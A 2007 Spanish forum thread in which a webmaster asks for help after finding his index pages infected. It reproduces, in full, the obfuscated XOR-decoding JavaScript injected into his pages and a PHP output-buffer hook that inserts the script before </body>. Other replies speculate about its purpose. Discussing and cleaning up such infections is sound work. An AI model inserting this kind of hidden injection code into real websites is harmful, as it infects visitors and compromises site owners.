Se infecta index.html/php

maderic_m · #1 (**permalink**) 24/09/2007, 12:28

Hola tengo un par de sitios arriva y mirando a ver como se veian en google descubro q tres de ellos google los identificaba como malisiosos, me pongo a ver un poco y resulta q en el inde.html o index.php aparecia este script q esta aca debajo,

Código:

<script language="JavaScript">e = '0x00' + '6E';str1 = "%D5%8D%86%9B%F1%9C%9D%96%85%8A%D2%CF%9B%86%9C%86%8F%86%85%86%9D%96%D7%89%86%8D%8D%8A%83%CF%D3%D5%86%8B%9F%8E%82%8A%F1%9C%9F%8C%D2%CF%89%9D%9D%81%D7%C0%C0%96%8A%84%9D%8C%83%9D%C3%86%83%8B%80%C0%85%8D%C0%88%9A%8C%C0%CF%F1%98%86%8D%9D%89%D2%DE%F1%89%8A%86%88%89%9D%D2%DE%D3%D5%C0%86%8B%9F%8E%82%8A%D3%D5%C0%8D%86%9B%D3";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

la verdad q no se bien de donde puede salir eso, yo investigue un poco y encontre el nombre de un troyano "Trojan-Downloader.JS.Psyme.hz ", pero no se si es es o no, si alguien sabe algo de como se inserta, de como lo puedo sacar, etc se lo agradesco, saludos

ese scrip genera la siguiente cadena:

maderic_m · #2 (**permalink**) 25/09/2007, 08:41

Encontre una nueva mutacion del dichoso virus, ahora hace esto en las paginas q uso sistema de plantillas,

Código:

<?php
//esto en la primera linia del script
ob_start("phpfake");

//esto al final del script
function phpfake($buffer)
{
  $Exp='<script language="JavaScript">e = \'0x00\' + \'6E\';str1 = "%D5%8D%86%9B%F1%9C%9D%96%85%8A%D2%CF%9B%86%9C%86%8F%86%85%86%9D%96%D7%89%86%8D%8D%8A%83%CF%D3%D5%86%8B%9F%8E%82%8A%F1%9C%9F%8C%D2%CF%89%9D%9D%81%D7%C0%C0%96%8A%84%9D%8C%83%9D%C3%86%83%8B%80%C0%85%8D%C0%88%9A%8C%C0%CF%F1%98%86%8D%9D%89%D2%DE%F1%89%8A%86%88%89%9D%D2%DE%D3%D5%C0%86%8B%9F%8E%82%8A%D3%D5%C0%8D%86%9B%D3";str=tmp=\'\';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>';
  return (ereg_replace("</body>", "$Exp<script language="JavaScript">e = '0x00' + '6E';str1 = "%D5%8D%86%9B%F1%9C%9D%96%85%8A%D2%CF%9B%86%9C%86%8F%86%85%86%9D%96%D7%89%86%8D%8D%8A%83%CF%D3%D5%86%8B%9F%8E%82%8A%F1%9C%9F%8C%D2%CF%89%9D%9D%81%D7%C0%C0%96%8A%84%9D%8C%83%9D%C3%86%83%8B%80%C0%85%8D%C0%88%9A%8C%C0%CF%F1%98%86%8D%9D%89%D2%DE%F1%89%8A%86%88%89%9D%D2%DE%D3%D5%C0%86%8B%9F%8E%82%8A%D3%D5%C0%8D%86%9B%D3";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script></body>", $buffer));
}
?>

pero como usu plantillas las paginas tiran error de sintaxis y no ingresan, por favor si alguien tiene la solucion o algun dato avise, gracias

PD: consejo revisenlos index de sus paginas, siempre se coloca al fianal del index, saludos

redbaron · #3 (**permalink**) 03/10/2007, 09:45

visiblemente es un "virus" que hace cargar página personales de los autores, probablemente para generar algun tipo de revenue con adsense o algo similar

maderic_m · #4 (**permalink**) 03/10/2007, 11:29

Si por lo que pude investigar es el virus que datelle al principio es un tipo de troyano que infecta los html o php, el nombre es ese de arriba y hasta ahora segun he visto los que lo detectan son kapersky y Nod32 seguro que capas alguno mas pero yo vi esos dos nos mas, saludos